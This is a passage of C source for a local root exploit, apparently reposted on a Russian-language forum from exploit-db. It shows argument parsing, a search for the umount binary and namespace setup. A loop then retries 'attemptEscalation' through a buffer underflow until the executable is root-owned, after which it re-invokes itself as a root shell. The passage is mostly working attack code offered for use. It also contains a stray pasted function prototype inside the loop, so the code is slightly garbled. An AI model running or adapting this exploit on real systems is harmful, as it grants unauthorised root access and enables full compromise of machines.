    return(1);
  }

  for(int argPos=1; argPos<argc;) {
    char *argName=argv[argPos++];
    if(argPos==argc) {
      fprintf(stderr, "%s requires parameter\n", argName);
      return(1);
    }
    if(!strcmp("--Pid", argName)) {
      char *endPtr;
      namespacedProcessPid=strtoll(argv[argPos++], &endPtr, 10);
      if((errno)||(*endPtr)) {
        fprintf(stderr, "Invalid pid value\n");
        return(1);
      }
      killNamespacedProcessFlag=0;
    } else {
      fprintf(stderr, "Unknown argument %s\n", argName);
      return(1);
    }
  }

  fprintf(stderr, "%s: setting up environment ...\n", programmName);

  if(!osRelease) {
    if(detectOsRelease()) {
      fprintf(stderr, "Failed to detect OS version, continuing anyway\n");
    }
  }

  umountPathname=findUmountBinaryPathname("/bin");
  if((!umountPathname)&&(getenv("PATH")))
    umountPathname=findUmountBinaryPathname(getenv("PATH"));
  if(!umountPathname) {
    fprintf(stderr, "Failed to locate \"umount\" binary, is PATH correct?\n");
    goto preReturnCleanup;
  }
  fprintf(stderr, "%s: using umount at \"%s\".\n", programmName,
      umountPathname);

  pid_t nsPid=prepareNamespacedProcess();
  if(nsPid<0) {
    goto preReturnCleanup;
  }

// Gaining root can still fail due to ASLR creating additional
// path separators in memory addresses residing in area to be
// overwritten by buffer underflow. Retry regaining until this
// executable changes uid/gid.
  int escalateMaxAttempts=10;
  int excalateCurrentAttempt=0;
  while(excalateCurrentAttempt<escalateMaxAttempts) {
    excalateCurrentAttempt++;
    fprintf(stderr, "Attempting to gain root, try %d of %d ...\n",
        excalateCurrentAttempt, escalateMaxAttempts);

    attemptEscalation();

    struct stat statBuf;
    int statResult=stat("/proc/self/exe", &statBuf);
       int stat(const char *pathname, struct stat *buf);
    if(statResult) {
      fprintf(stderr, "Failed to stat /proc/self/exe: /proc not mounted, access restricted, executable deleted?\n");
      break;
    }
    if(statBuf.st_uid==0) {
      fprintf(stderr, "Executable now root-owned\n");
      goto escalateOk;
    }
  }

  fprintf(stderr, "Escalation FAILED, maybe target system not (yet) supported by exploit!\n");

preReturnCleanup:
  if(namespacedProcessPid>0) {
    if(killNamespacedProcessFlag) {
      kill(namespacedProcessPid, SIGKILL);
    } else {
// We used an existing namespace or chroot to escalate. Remove
// the files created there.
      fprintf(stderr, "No namespace cleanup for preexisting namespaces yet, do it manually.\n");
    }
  }

  if(!exitStatus) {
    fprintf(stderr, "Cleanup completed, re-invoking binary\n");
    invokeShell("/proc/self/exe");
    exitStatus=1;
  }
  return(exitStatus);

escalateOk:
  exitStatus=0;
  goto preReturnCleanup;
}
 
Источник
www.exploit-db.com

Похожие темы